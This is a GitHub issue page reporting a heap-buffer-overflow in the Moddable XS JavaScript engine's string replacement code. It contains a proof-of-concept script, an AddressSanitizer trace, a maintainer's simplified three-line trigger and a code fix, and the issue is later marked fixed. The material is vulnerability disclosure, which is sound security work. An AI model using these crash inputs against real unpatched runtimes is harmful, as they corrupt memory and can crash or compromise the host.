Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Heap-buf-overflow (/usr/local/bin/xst+0x4ec9ab) in __asan_memcpy #759

Closed
hope-fly opened this issue Dec 28, 2021 · 2 comments
Closed

Heap-buf-overflow (/usr/local/bin/xst+0x4ec9ab) in __asan_memcpy #759

hope-fly opened this issue Dec 28, 2021 · 2 comments
Labels
confirmed issue reported has been reproduced fixed - please verify Issue has been fixed. Please verify and close.

Comments

@hope-fly
Copy link

hope-fly commented Dec 28, 2021

Moddable-XS revision

Commit: 2f93df29

Version: 11.5.0 32 4

Build environment

Ubuntu 18.04.5 LTS (Linux 5.4.0-44-generic x86_64)

Build steps
cd  ~/moddable/xs/makefiles/lin
make -f xst.mk
Test case
function JSEtest(str, count) {
  while (str.length < ("$1", 1 << 16)) {
      try {
         str += str;
      } catch (e) {}
  }
  return str.substring();
}
var x = JSEtest("1", 1 << 20);
var y = JSEtest("$1", 1 << 16);

var exception;
try {
  var __v_6623 = x.replace(/(.+)/g, y);
} catch (e) {
  exception = e;
}
Execution & Output with ASAN
$ ./moddable/build/bin/lin/debug/xst poc.js
==113836==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x7fdb09ffc820 at pc 0x0000004ec9ac bp 0x7ffe814586d0 sp 0x7ffe81457e80
WRITE of size 65536 at 0x7fdb09ffc820 thread T0
    #0 0x4ec9ab in __asan_memcpy (/usr/local/bin/xst+0x4ec9ab)
    #1 0x915e02 in fxPushSubstitutionString /root/moddable/xs/sources/xsString.c:1995:9
    #2 0x839a57 in fx_RegExp_prototype_replace /root/moddable/xs/sources/xsRegExp.c:834:5
    #3 0x84f3ca in fxRunID /root/moddable/xs/sources/xsRun.c:842:7
    #4 0x90d877 in fx_String_prototype_withRegexp /root/moddable/xs/sources/xsString.c:1675:5
    #5 0x8fc277 in fx_String_prototype_replace /root/moddable/xs/sources/xsString.c:1120:6
    #6 0x84f3ca in fxRunID /root/moddable/xs/sources/xsRun.c:842:7
    #7 0x8ceaac in fxRunScript /root/moddable/xs/sources/xsRun.c:4766:4
    #8 0xad3231 in fxRunProgramFile /root/moddable/xs/tools/xst.c:1387:2
    #9 0xacfa83 in main /root/moddable/xs/tools/xst.c:281:8
    #10 0x7fdb0cd0fbf6 in __libc_start_main /build/glibc-S9d2JN/glibc-2.27/csu/../csu/libc-start.c:310
    #11 0x42ddc9 in _start (/usr/local/bin/xst+0x42ddc9)

0x7fdb09ffc820 is located 0 bytes to the right of 16777248-byte region [0x7fdb08ffc800,0x7fdb09ffc820)
allocated by thread T0 here:
    #0 0x4edc80 in malloc (/usr/local/bin/xst+0x4edc80)
    #1 0x7dba63 in fxAllocateChunks /root/moddable/xs/sources/xsPlatforms.c:123:9
    #2 0x759641 in fxGrowChunks /root/moddable/xs/sources/xsMemory.c:506:11
    #3 0x75876a in fxAllocate /root/moddable/xs/sources/xsMemory.c:170:2
    #4 0x53d89c in fxCreateMachine /root/moddable/xs/sources/xsAPI.c:1382:4
    #5 0xace769 in main /root/moddable/xs/tools/xst.c:259:19
    #6 0x7fdb0cd0fbf6 in __libc_start_main /build/glibc-S9d2JN/glibc-2.27/csu/../csu/libc-start.c:310

SUMMARY: AddressSanitizer: heap-buffer-overflow (/usr/local/bin/xst+0x4ec9ab) in __asan_memcpy
Shadow bytes around the buggy address:
  0x0ffbe13f78b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0ffbe13f78c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0ffbe13f78d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0ffbe13f78e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0ffbe13f78f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=>0x0ffbe13f7900: 00 00 00 00[fa]fa fa fa fa fa fa fa fa fa fa fa
  0x0ffbe13f7910: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0ffbe13f7920: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0ffbe13f7930: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0ffbe13f7940: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0ffbe13f7950: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07
  Heap left redzone:       fa
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
==113836==ABORTING

No-ASAN Output

[1]    5720 segmentation fault  xst poc.js

Credits: Found by OWL337 team.

@phoddie phoddie added the confirmed issue reported has been reproduced label Dec 28, 2021
@phoddie
Copy link
Collaborator

phoddie commented Dec 28, 2021

The POC may be simplified to the following:

var x = "1".repeat(65536);
var y = "$1".repeat(32768);
x.replace(/(.+)/g, y);

A quick fix is change this line...

l += mxStringLength(capture->value.string);

...to use fxAddChunkSizes:

l = fxAddChunkSizes(the, l, mxStringLength(capture->value.string));

But it appears there are other paths wherel can overflow, so this requires further investigation.

mkellner pushed a commit that referenced this issue Jan 10, 2022
@phoddie phoddie added the fixed - please verify Issue has been fixed. Please verify and close. label Jan 10, 2022
@hope-fly
Copy link
Author

Verified!

@phoddie phoddie closed this as completed Jan 13, 2022
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
confirmed issue reported has been reproduced fixed - please verify Issue has been fixed. Please verify and close.
Projects
None yet
Development

No branches or pull requests

2 participants